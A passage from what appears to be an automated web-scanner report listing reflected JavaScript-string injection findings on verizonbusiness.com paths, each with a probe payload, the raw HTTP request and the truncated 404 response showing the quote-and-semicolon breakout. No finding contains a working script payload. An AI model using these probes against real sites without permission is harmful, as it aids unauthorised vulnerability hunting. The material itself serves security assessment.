Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions76e01";3f1f49b2768/bysolutions/security/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM EL
...[SNIP]...

1.993. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 306a2"%3b962f8f31fa3 was submitted in the REST URL parameter 2. This input was echoed as 306a2";962f8f31fa3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions306a2"%3b962f8f31fa3/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41872
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions306a2";962f8f31fa3/security/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.994. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64073'%3b6a92efe90b0 was submitted in the REST URL parameter 2. This input was echoed as 64073';6a92efe90b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions64073'%3b6a92efe90b0/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:12 GMT
Content-Type: text/html
Content-Length: 41872
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions64073';6a92efe90b0/security/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.995. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1140f"%3b968eb2c6520 was submitted in the REST URL parameter 3. This input was echoed as 1140f";968eb2c6520 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/security1140f"%3b968eb2c6520/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:16 GMT
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/security1140f";968eb2c6520/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.996. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb1d2'%3b6837c788635 was submitted in the REST URL parameter 3. This input was echoed as cb1d2';6837c788635 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/securitycb1d2'%3b6837c788635/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:43 GMT
Content-Type: text/html
Content-Length: 43098
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/securitycb1d2';6837c788635/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.997. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83a8b'%3b3d94583d9e2 was submitted in the REST URL parameter 1. This input was echoed as 83a8b';3d94583d9e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions83a8b'%3b3d94583d9e2/bysolutions/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:25 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions83a8b';3d94583d9e2/bysolutions/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.998. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8d6e"%3bbe532e843aa was submitted in the REST URL parameter 1. This input was echoed as c8d6e";be532e843aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc8d6e"%3bbe532e843aa/bysolutions/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc8d6e";be532e843aa/bysolutions/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.999. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8128"%3b021c737cbbf was submitted in the REST URL parameter 2. This input was echoed as b8128";021c737cbbf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsb8128"%3b021c737cbbf/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:02 GMT
Content-Type: text/html
Content-Length: 41864
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsb8128";021c737cbbf/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1000. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffc6a'%3b4bd27135e04 was submitted in the REST URL parameter 2. This input was echoed as ffc6a';4bd27135e04 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsffc6a'%3b4bd27135e04/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41864
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsffc6a';4bd27135e04/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1001. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abd9"%3bb3095a78cbe was submitted in the REST URL parameter 3. This input was echoed as 3abd9";b3095a78cbe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/ucc3abd9"%3bb3095a78cbe/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:42 GMT
Content-Type: text/html
Content-Length: 43088
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/ucc3abd9";b3095a78cbe/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1002. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78837'%3bd12377140db was submitted in the REST URL parameter 3. This input was echoed as 78837';d12377140db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/ucc78837'%3bd12377140db/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:08 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43086
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/ucc78837';d12377140db/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1003. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c80e'%3b723953db1db was submitted in the REST URL parameter 1. This input was echoed as 9c80e';723953db1db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions9c80e'%3b723953db1db/education/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:16 GMT
Content-Type: text/html
Content-Length: 40640
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions9c80e';723953db1db/education/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1004. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96e4a"%3b3a3155926ce was submitted in the REST URL parameter 1. This input was echoed as 96e4a";3a3155926ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions96e4a"%3b3a3155926ce/education/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40640
Date: Wed, 17 Nov 2010 00:36:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions96e4a";3a3155926ce/education/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.1005. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9363"%3bc0c6099cf49 was submitted in the REST URL parameter 2. This input was echoed as a9363";c0c6099cf49 in the application's response.

